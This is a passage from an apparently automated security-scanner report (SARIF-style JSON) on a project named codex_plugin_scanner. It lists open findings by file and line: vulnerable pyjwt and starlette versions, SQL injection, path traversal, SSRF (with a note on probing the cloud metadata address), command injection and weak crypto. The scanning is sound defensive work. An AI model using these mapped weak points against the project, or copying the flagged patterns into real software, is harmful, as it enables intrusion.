"isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48524", "GHSA-fhv5-28vv-h8m8"], "package": "pyjwt", "rule_id": "PYSEC-2026-177", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48524|requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-175", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-175"}, "properties": {"repobilityId": 145074, "scanner": "osv-scanner", "fingerprint": "6e43e9e4fcddce5ed9d95508ee3af57e07c02f8be6ef2b4c716c8f00f38e9ef4", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48522", "GHSA-993g-76c3-p5m4"], "package": "pyjwt", "rule_id": "PYSEC-2026-175", "scanner": "osv-scanner", "correlation_key": 
"vuln|pyjwt|CVE-2026-48522|requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-161", "level": "error", "message": {"text": "starlette: PYSEC-2026-161"}, "properties": {"repobilityId": 145070, "scanner": "osv-scanner", "fingerprint": "9f5157a4b7e18e3e5c909d3b190cea06647368a6f8c4a5fc6378d5f5d990e58e", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["CVE-2026-48710", "GHSA-86qp-5c8j-p5mr", "X41-2026-002"], "package": "starlette", "rule_id": "PYSEC-2026-161", "scanner": "osv-scanner", "correlation_key": "vuln|starlette|CVE-2026-48710|docker-requirements.txt", "duplicate_count": 1, "duplicate_rule_ids": ["GHSA-86qp-5c8j-p5mr", "PYSEC-2026-161"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["61c62df1f1bb49ab99cb59e0e8fbaade2dc47cf5bbc4431be4362db57604cb1f", "9f5157a4b7e18e3e5c909d3b190cea06647368a6f8c4a5fc6378d5f5d990e58e"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-179", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-179"}, "properties": {"repobilityId": 145069, "scanner": "osv-scanner", "fingerprint": "b0f57bc88ba014761212b138f85e0d2f3080fd666d806ad5ed415168af003887", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48526", "GHSA-xgmm-8j9v-c9wx"], "package": "pyjwt", "rule_id": "PYSEC-2026-179", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48526|docker-requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": 
{"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-178", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-178"}, "properties": {"repobilityId": 145068, "scanner": "osv-scanner", "fingerprint": "03fa487ca5464d9cb9de1d4dbb36760077a8c755c6d869697bd0aa2d824f1c47", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48525", "GHSA-w7vc-732c-9m39"], "package": "pyjwt", "rule_id": "PYSEC-2026-178", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48525|docker-requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-177", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-177"}, "properties": {"repobilityId": 145067, "scanner": "osv-scanner", "fingerprint": "1b2ae50d86c4f2c649125c3e56b4fff487f87b74245fa0be49151f29e7e8d96a", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48524", "GHSA-fhv5-28vv-h8m8"], "package": "pyjwt", "rule_id": "PYSEC-2026-177", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48524|docker-requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-175", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-175"}, "properties": {"repobilityId": 145066, "scanner": "osv-scanner", "fingerprint": "bf0fc737bfb197ac41cf8574a4875b58cf0f24492511f65af343037c0387acbf", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48522", "GHSA-993g-76c3-p5m4"], "package": "pyjwt", "rule_id": "PYSEC-2026-175", 
"scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48522|docker-requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "MINED009", "level": "error", "message": {"text": "[MINED009] Floats For Money: Variable named price/amount/cost typed as float instead of Decimal."}, "properties": {"repobilityId": 145029, "scanner": "repobility-threat-engine", "fingerprint": "972fbbaa7a12a72bbfcb1861c864679232e3f80170bab29e4246b8b85af66fde", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "floats-for-money", "owasp": null, "cwe_ids": ["CWE-682"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347918+00:00", "triaged_in_corpus": 15, "observations_count": 208571, "ai_coder_pattern_id": 20}, "scanner": "repobility-threat-engine", "correlation_key": "fp|972fbbaa7a12a72bbfcb1861c864679232e3f80170bab29e4246b8b85af66fde"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/trust_models.py"}, "region": {"startLine": 56}}}]}, {"ruleId": "SEC128", "level": "error", "message": {"text": "[SEC128] Async function without await \u2014 fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work completes \u2014 DB writes lost, emails not sent, race conditions. This is one of the top-3 errors AI coders make: they understand async-shape but drop the await keyword when chaining multiple ops. 
Surfaces as flaky tests or silently dropped data in production."}, "properties": {"repobilityId": 145028, "scanner": "repobility-threat-engine", "fingerprint": "519297ca500173880c534fbb319442bc51b2ee6066af073bd1c5ff5d7b7d158c", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "hasher.update(chunk)", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC128", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|519297ca500173880c534fbb319442bc51b2ee6066af073bd1c5ff5d7b7d158c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/quality_artifact.py"}, "region": {"startLine": 42}}}]}, {"ruleId": "MINED006", "level": "error", "message": {"text": "[MINED006] Overcatch Baseexception: except BaseException: ... \u2014 prevents Ctrl+C and SystemExit from working."}, "properties": {"repobilityId": 145027, "scanner": "repobility-threat-engine", "fingerprint": "aa61af5c165c327eda37b36f5b2721255277fc967628af6c1e50e0038901fdd2", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "overcatch-baseexception", "owasp": null, "cwe_ids": ["CWE-705"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347911+00:00", "triaged_in_corpus": 15, "observations_count": 230624, "ai_coder_pattern_id": 8}, "scanner": "repobility-threat-engine", "correlation_key": "fp|aa61af5c165c327eda37b36f5b2721255277fc967628af6c1e50e0038901fdd2"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/integrations/cisco_skill_scanner.py"}, "region": {"startLine": 90}}}]}, {"ruleId": "MINED004", "level": "error", 
"message": {"text": "[MINED004] Weak Crypto: MD5/SHA1/DES/RC4 used for security context (not just checksums)."}, "properties": {"repobilityId": 145026, "scanner": "repobility-threat-engine", "fingerprint": "3f3ba19280af73227a0cfb6a3ea7717033c46211a0f44a6eac914d90179bc4af", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "weak-crypto", "owasp": "A02:2021", "cwe_ids": ["CWE-327"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347906+00:00", "triaged_in_corpus": 15, "observations_count": 303181, "ai_coder_pattern_id": 13}, "scanner": "repobility-threat-engine", "correlation_key": "fp|3f3ba19280af73227a0cfb6a3ea7717033c46211a0f44a6eac914d90179bc4af"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/totp.py"}, "region": {"startLine": 17}}}]}, {"ruleId": "SEC004", "level": "error", "message": {"text": "[SEC004] SQL Injection Risk: String interpolation in SQL execution. 
Allows SQL injection."}, "properties": {"repobilityId": 145020, "scanner": "repobility-threat-engine", "fingerprint": "dc199c16fbaa39b826c3911761a55c1200ed46c57521675fbb7810758f2d5907", "category": "injection", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": ".execute(\n        f\"select", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC004", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|injection|token|173|sec004"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store_evidence.py"}, "region": {"startLine": 173}}}]}, {"ruleId": "SEC078", "level": "error", "message": {"text": "[SEC078] Python: requests without timeout: requests.get/post without a timeout will hang indefinitely on a non-responsive server, causing thread exhaustion and denial of service. Ported from bandit B113 (Apache-2.0). 
NOTE: this regex is heuristic; a real AST check is preferred for accuracy."}, "properties": {"repobilityId": 145014, "scanner": "repobility-threat-engine", "fingerprint": "b1c2c3b4bb1cbe7b26af172c9d09cda5836b77f631115f2c08ea24b4aeaa730c", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "requests.post(", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC078", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|b1c2c3b4bb1cbe7b26af172c9d09cda5836b77f631115f2c08ea24b4aeaa730c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/bridge/__init__.py"}, "region": {"startLine": 103}}}]}, {"ruleId": "SEC013", "level": "error", "message": {"text": "[SEC013] Path Traversal \u2014 User Input in File Path: User-controlled input used in file path without sanitization. 
Allows reading arbitrary files."}, "properties": {"repobilityId": 145012, "scanner": "repobility-threat-engine", "fingerprint": "85d64e175210ddadf34637d0f12dc24dc61f9c6f76fb0d0e75d005045b3524b5", "category": "path_traversal", "severity": "high", "confidence": 0.8, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "User-controlled input detected in file path construction", "evidence": {"match": "open(request", "reason": "User-controlled input detected in file path construction", "rule_id": "SEC013", "scanner": "repobility-threat-engine", "confidence": 0.8, "correlation_key": "code|path_traversal|token|153|sec013"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/daemon/client.py"}, "region": {"startLine": 153}}}]}, {"ruleId": "SEC013", "level": "error", "message": {"text": "[SEC013] Path Traversal \u2014 User Input in File Path: User-controlled input used in file path without sanitization. Allows reading arbitrary files."}, "properties": {"repobilityId": 145011, "scanner": "repobility-threat-engine", "fingerprint": "2117336c2a032232d8529bbc3c376e14ca731877099e6a53a570bcbd73621755", "category": "path_traversal", "severity": "high", "confidence": 0.8, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "User-controlled input detected in file path construction", "evidence": {"match": "open(request", "reason": "User-controlled input detected in file path construction", "rule_id": "SEC013", "scanner": "repobility-threat-engine", "confidence": 0.8, "correlation_key": "code|path_traversal|token|111|sec013"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/adapters/claude_daemon_hook_bridge.py"}, "region": {"startLine": 111}}}]}, {"ruleId": "SEC013", "level": "error", "message": {"text": "[SEC013] Path Traversal \u2014 User Input in File Path: User-controlled input used in file path without sanitization. 
Allows reading arbitrary files."}, "properties": {"repobilityId": 145010, "scanner": "repobility-threat-engine", "fingerprint": "126992c146fc04e342ea9a78c0a5311c0498280d865c628c25b26c63666ec044", "category": "path_traversal", "severity": "high", "confidence": 0.8, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "User-controlled input detected in file path construction", "evidence": {"match": "open(request, timeout=REQUEST", "reason": "User-controlled input detected in file path construction", "rule_id": "SEC013", "scanner": "repobility-threat-engine", "confidence": 0.8, "correlation_key": "code|path_traversal|token|232|sec013"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/github_reporting.py"}, "region": {"startLine": 232}}}]}, {"ruleId": "MINED001", "level": "error", "message": {"text": "[MINED001] Bare Except Pass: except: pass or except Exception: pass \u2014 silently swallows errors and hides bugs; a bare except: also swallows KeyboardInterrupt and SystemExit."}, "properties": {"repobilityId": 145004, "scanner": "repobility-threat-engine", "fingerprint": "d0ad6eeb850a0779c3bbe29e6247009871667c85e0f344f729af0c6a8b02cfdf", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "bare-except-pass", "owasp": null, "cwe_ids": ["CWE-755"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347744+00:00", "triaged_in_corpus": 15, "observations_count": 1550824, "ai_coder_pattern_id": 6}, "scanner": "repobility-threat-engine", "correlation_key": "fp|d0ad6eeb850a0779c3bbe29e6247009871667c85e0f344f729af0c6a8b02cfdf"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/gemini.py"}, "region": {"startLine": 28}}}]}, {"ruleId": "MINED001", "level": "error", "message": {"text": 
"[MINED001] Bare Except Pass: except: pass or except Exception: pass \u2014 silently swallows errors and hides bugs; a bare except: also swallows KeyboardInterrupt and SystemExit."}, "properties": {"repobilityId": 145003, "scanner": "repobility-threat-engine", "fingerprint": "50296fffaf8d0454cff63551194635753eab27b4db596a4471e47f04deb4afc0", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "bare-except-pass", "owasp": null, "cwe_ids": ["CWE-755"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347744+00:00", "triaged_in_corpus": 15, "observations_count": 1550824, "ai_coder_pattern_id": 6}, "scanner": "repobility-threat-engine", "correlation_key": "fp|50296fffaf8d0454cff63551194635753eab27b4db596a4471e47f04deb4afc0"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/codex.py"}, "region": {"startLine": 28}}}]}, {"ruleId": "MINED001", "level": "error", "message": {"text": "[MINED001] Bare Except Pass: except: pass or except Exception: pass \u2014 silently swallows errors and hides bugs; a bare except: also swallows KeyboardInterrupt and SystemExit."}, "properties": {"repobilityId": 145002, "scanner": "repobility-threat-engine", "fingerprint": "8b1c3f83066a12a1351d387fe25dca145322b60ec8df45e079c50fca50e22ae3", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "bare-except-pass", "owasp": null, "cwe_ids": ["CWE-755"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347744+00:00", "triaged_in_corpus": 15, "observations_count": 1550824, "ai_coder_pattern_id": 6}, "scanner": "repobility-threat-engine", "correlation_key": 
"fp|8b1c3f83066a12a1351d387fe25dca145322b60ec8df45e079c50fca50e22ae3"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/claude.py"}, "region": {"startLine": 28}}}]}, {"ruleId": "SEC085", "level": "error", "message": {"text": "[SEC085] JS: child_process.exec with non-literal: child_process.exec with user-derived input enables command injection. Ported from eslint-plugin-security detect-child-process (Apache-2.0)."}, "properties": {"repobilityId": 144993, "scanner": "repobility-threat-engine", "fingerprint": "8a4b21c987cb0b1b687395a1c8a5c54ae5cb00d332a80633c3c0ed86e8defeb3", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "exec(primary", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC085", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|8a4b21c987cb0b1b687395a1c8a5c54ae5cb00d332a80633c3c0ed86e8defeb3"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/risk-signal-cards.tsx"}, "region": {"startLine": 114}}}]}, {"ruleId": "SEC029", "level": "error", "message": {"text": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.254.169.254 metadata, internal Kubernetes endpoints, file:// URIs), exfiltrate data, or pivot through your network. 
SSRF is OWASP A10:2021 and a frequent foothold in cloud breaches."}, "properties": {"repobilityId": 144990, "scanner": "repobility-threat-engine", "fingerprint": "3f656327a4839a29c3d150ccaea16d2c8c88d98d9a2fa4b24667b8a36f64fa22", "category": "ssrf", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "url(v", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC029", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|3f656327a4839a29c3d150ccaea16d2c8c88d98d9a2fa4b24667b8a36f64fa22"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/checks/manifest_support.py"}, "region": {"startLine": 48}}}]}, {"ruleId": "SEC029", "level": "error", "message": {"text": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.254.169.254 metadata, internal Kubernetes endpoints, file:// URIs), exfiltrate data, or pivot through your network. 
SSRF is OWASP A10:2021 and a frequent foothold in cloud breaches."}, "properties": {"repobilityId": 144989, "scanner": "repobility-threat-engine", "fingerprint": "3360ff6d684d6491a5498be4f1f808d473d1eb9cba820c7dc038397199875f9e", "category": "ssrf", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "URL(b", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC029", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|3360ff6d684d6491a5498be4f1f808d473d1eb9cba820c7dc038397199875f9e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/history-export.ts"}, "region": {"startLine": 76}}}]}, {"ruleId": "SEC029", "level": "error", "message": {"text": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.254.169.254 metadata, internal Kubernetes endpoints, file:// URIs), exfiltrate data, or pivot through your network. 
SSRF is OWASP A10:2021 and a frequent foothold in cloud breaches."}, "properties": {"repobilityId": 144988, "scanner": "repobility-threat-engine", "fingerprint": "93a728cbb36055163dcbc76887182ef56a9a08be65da09f745f01ca2176ea706", "category": "ssrf", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "URL(w", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC029", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|93a728cbb36055163dcbc76887182ef56a9a08be65da09f745f01ca2176ea706"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/evidence/evidence-url-state.ts"}, "region": {"startLine": 91}}}]}, {"ruleId": "MINED118", "level": "error", "message": {"text": "Dockerfile FROM `codex_plugin_scanner.cli (no tag)` not pinned by digest"}, "properties": {"repobilityId": 144973, "scanner": "repobility-supply-chain", "fingerprint": "c9ee5d58994dbb5821e61a68d923a96876bfd08ee00d73b4deb811dc984a77be", "category": "dependency", "severity": "high", "confidence": 0.9, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "docker-from-unpinned", "owasp": "A08:2021", "cwe_ids": ["CWE-829"], "languages": ["dockerfile"], "observations_count": 0}, "scanner": "repobility-supply-chain", "correlation_key": "fp|c9ee5d58994dbb5821e61a68d923a96876bfd08ee00d73b4deb811dc984a77be"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "Dockerfile"}, "region": {"startLine": 35}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_future_generated_at_fails"}, "properties": {"repobilityId": 144936, "scanner": "repobility-ast-engine", "fingerprint": "4099a0180d3e9bdaa6f0fef2baee15c2311f538a1d45d457e1ba0e96951c11a9", "category": "quality", "severity": "high", 
"confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4099a0180d3e9bdaa6f0fef2baee15c2311f538a1d45d457e1ba0e96951c11a9"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 209}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_expired_bundle_fails"}, "properties": {"repobilityId": 144935, "scanner": "repobility-ast-engine", "fingerprint": "4dd75ebdad4d11d1ecfd1516eb4437801a89e480d0f792666ee790e97c842ae0", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4dd75ebdad4d11d1ecfd1516eb4437801a89e480d0f792666ee790e97c842ae0"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 203}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_fresh_bundle_passes"}, "properties": {"repobilityId": 144934, "scanner": "repobility-ast-engine", "fingerprint": "df4c5af9ac99bb85d087344498017a2d9d58b1a3ce1963de5abd930a60ec0271", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": 
"fp|df4c5af9ac99bb85d087344498017a2d9d58b1a3ce1963de5abd930a60ec0271"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 198}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_invalid_public_key_pem_fails"}, "properties": {"repobilityId": 144933, "scanner": "repobility-ast-engine", "fingerprint": "99f532ea254be9f4398454c4928a759554be3029ed9e2f6ad193859000bb2ab7", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|99f532ea254be9f4398454c4928a759554be3029ed9e2f6ad193859000bb2ab7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 188}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_invalid_base64_signature_fails"}, "properties": {"repobilityId": 144932, "scanner": "repobility-ast-engine", "fingerprint": "6f479a79a00f5ea5757bac1d5050624b498f7a5b0b402f31621fbe9ddd3a9b34", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|6f479a79a00f5ea5757bac1d5050624b498f7a5b0b402f31621fbe9ddd3a9b34"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 182}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: 
test_wrong_key_fails"}, "properties": {"repobilityId": 144931, "scanner": "repobility-ast-engine", "fingerprint": "378208c2971a38488685b261f942ceb3178788220885693e0e875a822d0f857d", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|378208c2971a38488685b261f942ceb3178788220885693e0e875a822d0f857d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 175}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_tampered_advisory_fails"}, "properties": {"repobilityId": 144930, "scanner": "repobility-ast-engine", "fingerprint": "15a23fda201269eb102636245231686aed2e053ab459bf368d0730b2ef768a29", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|15a23fda201269eb102636245231686aed2e053ab459bf368d0730b2ef768a29"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 161}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_valid_signature_passes"}, "properties": {"repobilityId": 144929, "scanner": "repobility-ast-engine", "fingerprint": "e634d44606a51dc4eae5392e34404d1553ff1c8abc6eff8b2dffcceec65804b4", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", 
"evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|e634d44606a51dc4eae5392e34404d1553ff1c8abc6eff8b2dffcceec65804b4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_threat_intel.py"}, "region": {"startLine": 156}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_encoded_canary_script_is_valid_python"}, "properties": {"repobilityId": 144928, "scanner": "repobility-ast-engine", "fingerprint": "86148c73e6216913a1ea0b172f429a8e49f4a6491c83a48efee256dfe9240939", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|86148c73e6216913a1ea0b172f429a8e49f4a6491c83a48efee256dfe9240939"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_canary_fixtures.py"}, "region": {"startLine": 102}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_canary_script_is_valid_python"}, "properties": {"repobilityId": 144927, "scanner": "repobility-ast-engine", "fingerprint": "b2daa29986254e47d8f7a0dbb85024347d2b5fe7308d47d73ae3c94e632ee36e", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": 
